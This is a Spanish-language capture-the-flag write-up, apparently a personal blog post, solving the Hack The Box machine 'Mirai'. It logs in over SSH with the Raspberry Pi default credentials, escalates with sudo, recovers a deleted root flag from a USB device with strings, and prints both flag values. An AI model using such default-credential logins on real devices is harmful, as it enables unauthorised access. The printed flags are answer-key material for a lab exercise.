Ok, mi primera victima.

  1. Probe (Investigación)
    1. Un poco de investigación del nombre del box
    2. Puertos abiertos y servicios
  2. Penetrate
    1. Que exploits puedo usar y cuales funcionaron
  3. Persist (en este caso será escalation porque no persistiré nada…)
  4. Que aprendí
    1. Aquí tengo que acordarme de poner las tags…
  5. Herramientas.
  6. Fuentes.

 

1 Probe, 

Analisis del nombre:

Mirai es un malware de la familia de las botnets destinada a infectar los equipos conformantes del IoT. El objetivo principal de este malware es la infección de routers y cámaras IP, usando estos para realizar ataques de tipo DDoS. La botnet Mirai ha sido utilizada en algunos de los ataques del tipo DDoS más grandes y bruscos de la historia, dentro de los que se incluyen el realizado al sitio web de Brian Krebs , y al proveedor Dyn en octubre de 2016.

Mirai escanea continuamente los dispositivos enlazados a IoT y los infecta accediendo mediante telnet con las credenciales de acceso que vienen por defecto, cargando su código malicioso en la memoria principal del dispositivo, de esta forma queda infectado hasta que es reiniciado.

Me podria imaginar antes siquiera de abrir la maquina que el truco va a estar en telnet, passwords o ataques de memoria. 

Vamos a hackear, analisis de puertos abiertos y servicios:

Despues de conectarte a hackthebox lo que hice fue abrir sparta que es como un super nmap.

Solo tuve que agregar el host y correr el programa.

en la pestaña de nikto nos dice esto:

OSVDB-3093: /admin/index.php: This might be interesting… has been seen in web logs from an unknown scanner.

2 Penetrate

podemos entrar a esa página y de probar default passwords (mirai)

nada..

ok pero el default en ssh funciona

ssh [email protected] 
[email protected]'s password: raspberry

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ 

ha, estamos dentro, busquemos las banderas

pi@raspberrypi:~ $ ls
background.jpg  Documents  Music         Pictures  python_games  Videos
Desktop         Downloads  oldconffiles  Public    Templates
pi@raspberrypi:~ $ cd Desktop/
pi@raspberrypi:~/Desktop $ ls
Plex  user.txt
pi@raspberrypi:~/Desktop $ strings user.txt 
ff837707441b257a20e32199d7c8838d
pi@raspberrypi:~/Desktop $ 

Como es una raspberry pi todos somos sudo por default

El root.txt (donde debería estar la bandera) dice:

Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

sudo su
root@raspberrypi:/home/pi/Desktop# sudo strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
root@raspberrypi:/home/pi/Desktop# 

Así que encontramos las dos flags. y todos felices porque ya tenemos nuestro primer root y usuario.

Herramientas

Sparta y ssh .

Lo que aprendí

El nombre es muy importante

Las banderas en general están en el desktop en windows

en linux están en root la root.txt

Sparta es maravilloso

dirbuster tiene una lista de palabras en español